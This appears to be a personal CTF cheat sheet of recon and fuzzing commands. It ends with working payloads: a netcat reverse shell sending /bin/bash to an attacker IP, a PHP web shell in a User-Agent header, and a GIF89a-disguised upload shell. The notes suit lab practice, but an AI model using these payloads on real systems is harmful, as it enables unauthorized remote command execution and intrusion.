Skip to content

CTF

General


ping

ping -c 10 <IP>

curl

curl --head <IP>

nmap - init

nmap -p- <IP>

nmap - full

nmap -p 22,80 -sC -sV <IP>
cat ports.txt | cut -d "/" -f 1 | tr '\n' ','

hping3

sudo hping3 --scan all -S <IP>

enum4linux

enum4linux <IP>

create wordlist

curl http://11.22.33.44 | grep -oE '\w+' | sort -u -f > wordlist.lst
awk 'length($0) > 3 ' wordlist.lst > wordlist_gt3.lst

gobuster

gobuster dir --url <IP> -w /usr/share/wordlists/dirb/big.txt -b 404 -k -f -x php
gobuster dir --url <IP> --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dir --url <IP>:7125 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html -t 30 -k | tee gobuster_7125.raw.md

wfuzz

# === fuzz directories
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt --hc 404  "$URL/FUZZ"
# === fuzz files
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt --hc 404  "$URL/FUZZ"
# === fuzz parameters
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt --hc 302,404 "$URL?FUZZ"
# === fuzz users
wfuzz -c -z file,/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt --hc 404,403  "$URL?user=FUZZ"
# === linux files
wfuzz -c -z file,'/usr/share/wordlists/payloadsAllTheThings/File Inclusion/Intruders/Linux-files.txt' --hw 0  "$(target)/console/file.php?file=FUZZ"
wfuzz -c -z file,'/usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt' --hw 0  "$(target)/console/file.php?file=FUZZ"

feroxbuster

feroxbuster --url http://$(target)/ -o feroxbuster_80.txt -e -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

ffuf

ffuf -w /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -X POST -d '{"key":"value"}' -u http://$(target):8081/api/FUZZ -fw 2

autorecon

autorecon 10.10.99.99

python local server

python3 -m http.server 8080

Other


spawning tty shell

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg
stty rows 38 columns 116
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg
stty rows 38 columns 116

netcat nc shell

ATTACKER: netcat -lvnp 4444
TARGET: netcat 10.18.9.175 4444 -e /bin/bash
-- 
TARGET: netcat -lvp 4444 -e /bin/bash
ATTACKER: netcat 10.10.161.83 4444

funny User-Agent

User-Agent: Mozilla<pre><?php echo shell_exec($_REQUEST['cmd']) ?></pre>

GIF89a; header

GIF89a is a GIF file header. If uploaded content is being scanned, sometimes the check can be fooled by putting this header item at the top of shellcode:

GIF89a;
<?
system($_GET['cmd']); # shellcode goes here
?>